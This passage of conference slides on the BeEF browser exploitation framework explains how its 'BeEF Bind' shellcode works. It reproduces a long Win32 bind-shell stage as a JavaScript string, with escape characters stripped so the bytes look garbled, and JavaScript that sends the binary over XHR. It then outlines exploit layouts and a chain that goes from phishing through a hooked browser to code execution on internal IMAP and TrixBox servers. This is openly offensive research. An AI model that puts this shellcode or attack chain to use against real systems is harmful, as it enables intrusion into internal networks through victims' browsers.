  • 29. 29 BeEF Bind shellcode how it works • The stage sets up a bind port on 4444/TCP to accept HTTP POST requests from the web browser. • Set of pipes to redirect the cmd.exe input and output. This allows to jump in the middle of the HTTP request and the cmd.exe process to implement the web server style functionality. • The command result output is returned with the Access-Control-Allow-Origin: * header. After the stage is deployed, SOP is not a problem anymore. var stage_allow_origin = "xfcxe8x89x00x00x00x60x89xe5x31xd2x64x8bx52x30x8bx52x0cx8bx52x14x8bx72x28" "x0fxb7x4ax26x31xffx31xc0xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf0x52" + "x57x8bx52x10x8bx42x3cx01xd0x8bx40x78x85xc0x74x4ax01xd0x50x8bx48x18x8b" + "x58x20x01xd3xe3x3cx49x8bx34x8bx01xd6x31xffx31xc0xacxc1xcfx0dx01xc7x38" + "xe0x75xf4x03x7dxf8x3bx7dx24x75xe2x58x8bx58x24x01xd3x66x8bx0cx4bx8bx58" + "x1cx01xd3x8bx04x8bx01xd0x89x44x24x24x5bx5bx61x59x5ax51xffxe0x58x5fx5a" + "x8bx12xebx86x5dxbbx00x10x00x00x6ax40x53x53x6ax00x68x58xa4x53xe5xffxd5" + "x89xc6x68x01x00x00x00x68x00x00x00x00x68x0cx00x00x00x68x00x00x00x00x89" + "xe3x68x00x00x00x00x89xe1x68x00x00x00x00x8dx7cx24x0cx57x53x51x68x3excf" + "xafx0exffxd5x68x00x00x00x00x89xe3x68x00x00x00x00x89xe1x68x00x00x00x00" + "x8dx7cx24x14x57x53x51x68x3excfxafx0exffxd5x8bx5cx24x08x68x00x00x00x00" + "x68x01x00x00x00x53x68xcax13xd3x1cxffxd5x8bx5cx24x04x68x00x00x00x00x68" + "x01x00x00x00x53x68xcax13xd3x1cxffxd5x89xf7x68x63x6dx64x00x89xe3xffx74" + "x24x10xffx74x24x14xffx74x24x0cx31xf6x6ax12x59x56xe2xfdx66xc7x44x24x3c" + "x01x01x8dx44x24x10xc6x00x44x54x50x56x56x56x46x56x4ex56x56x53x56x68x79" + "xccx3fx86xffxd5x89xfexb9xf8x0fx00x00x8dx46x08xc6x00x00x40xe2xfax56x8d" + "xbex18x04x00x00xe8x62x00x00x00x48x54x54x50x2fx31x2ex31x20x32x30x30x20" + "x4fx4bx0dx0ax43x6fx6ex74x65x6ex74x2dx54x79x70x65x3ax20x74x65x78x74x2f" + "x68x74x6dx6cx0dx0ax41x63x63x65x73x73x2dx43x6fx6ex74x72x6fx6cx2dx41x6c" + "x6cx6fx77x2dx4fx72x69x67x69x6ex3ax20x2ax0dx0ax43x6fx6ex74x65x6ex74x2d" + "x4cx65x6ex67x74x68x3ax20x33x30x31x36x0dx0ax0dx0ax5exb9x62x00x00x00xf3" + "xa4x5ex56x68x33x32x00x00x68x77x73x32x5fx54x68x4cx77x26x07xffxd5xb8x90" + "x01x00x00x29xc4x54x50x68x29x80x6bx00xffxd5x50x50x50x50x40x50x40x50x68" + "xeax0fxdfxe0xffxd5x97x31xdbx53x68x02x00x11x5cx89xe6x6ax10x56x57x68xc2" + "xdbx37x67xffxd5x53x57x68xb7xe9x38xffxffxd5x53x53x57x68x74xecx3bxe1xff" + "xd5x57x97x68x75x6ex4dx61xffxd5x81xc4xa0x01x00x00x5ex89x3ex6ax00x68x00" + "x04x00x00x89xf3x81xc3x08x00x00x00x53xffx36x68x02xd9xc8x5fxffxd5x8bx54" + "x24x64xb9x00x04x00x00x81x3bx63x6dx64x3dx74x06x43x49xe3x3axebxf2x81xc3" + "x03x00x00x00x43x53x68x00x00x00x00x8dxbex10x04x00x00x57x68x01x00x00x00" + "x53x8bx5cx24x70x53x68x2dx57xaex5bxffxd5x5bx80x3bx0ax75xdax68xe8x03x00" + "x00x68x44xf0x35xe0xffxd5x31xc0x50x8dx5ex04x53x50x50x50x8dx5cx24x74x8b" + "x1bx53x68x18xb7x3cxb3xffxd5x85xc0x74x44x8bx46x04x85xc0x74x3dx68x00x00" + "x00x00x8dxbex14x04x00x00x57x68x86x0bx00x00x8dxbex7ax04x00x00x57x8dx5c" + "x24x70x8bx1bx53x68xadx9ex5fxbbxffxd5x6ax00x68xe8x0bx00x00x8dxbex18x04" + "x00x00x57xffx36x68xc2xebx38x5fxffxd5xffx36x68xc6x96x87x52xffxd5xe9x38" + "xfexffxff";
  • 30. • Shellcode is binary data • Stager and Stage are delivered with XMLHttpRequest.sendAsBinary • For Webkit browsers that don’t support sendAsBinary, prototype overriding on XHR object. BeEF Bind shellcode delivery and usage from within BeEF if (!XMLHttpRequest.prototype.sendAsBinary) { XMLHttpRequest.prototype.sendAsBinary = function (sData) { var nBytes = sData.length, ui8Data = new Uint8Array(nBytes); for (var nIdx = 0; nIdx < nBytes; nIdx++) { ui8Data[nIdx] = sData.charCodeAt(nIdx) & 0xff; } this.send(ui8Data); };} Stager - Stage
  • 31. • We cannot know in advance the exact size of HTTP headers. • A dummy cross-domain XHR request is sent back to BeEF, exact size of headers is calculated, and exploit junk is adjusted accordingly. • Like in all exploits, 1 byte error is enough to have a not-working exploit. • With this approach, errors are minimized and the exploit becomes reliable. BeEF Bind shellcode delivery and usage from within BeEF
  • 32. • Typical SEH exploit with EggHunter, non-IPEC: • commands + junk + shellcode + next_seh + seh + egg_hunter • Typical SEH exploit with EggHunter, IPEC: • HTTP_headers + commands + (less)junk + shellcode + next_seh + seh + egg_hunter BeEF Bind shellcode delivery and usage from within BeEF
  • 33. BeEF Bind shellcode delivery and usage from within BeEF Immunity DBG view: IMAP process memory when sending the stager
  • 34. BeEF Bind shellcode delivery and usage from within BeEF Wireshark view: exploit with shellcode stager Wireshark view: command delivery and results
  • 35. 35 BeEF Bind shellcode delivery and usage from within BeEF Ultimate fun. BeEF IPEC shell (JS) exec command get results set target
  • 36. Demo fun from phishing to internal IMAP server compromise
  • 37. • Bart Leppens ported the Win32 BeEF Bind shellcode to Linux • Great to be used as shellcode for normal Linux exploits • Great to be used as a binary with any Remote Command Execution • TrixBox <= 2.6.1 pre-auth RCE example with BeEF Bind Linux • Exploit here (through normal sockets, not from the browsers): http://www.exploit-db.com/exploits/6026/ BeEF Bind shellcode delivery and usage from within BeEF
  • 38. • Identify TrixBox in the hooked browser internal network (BeEF “internal_network_fingerprinting”module) • Get the current PHPSESSID, needed to trigger the malicious PHP code that will be leaving in PHP’s $_SESSION object • The attack vector downloads the BeEF Bind shellcode stager and executes it • Last step is send to the stager bind port the Stage contents • You’re now ready to send commands and get results from the hooked browser BeEF Bind shellcode delivery and usage from within BeEF
  • 39. Demo fun TrixBox RCE exploitation from the browser
  • 40. • Wade and the other BeEF guys • Ty and Bart for their awesome shellcodes • Mario and the other awesome speakers • If you want to support BeEF, buy our book. 50% of royalties will be used exclusively for the BeEF project (no joke)! • http://www.amazon.co.uk/Browser-Hackers-Handbook- Wade-Alcorn/dp/1118662091/ Thanks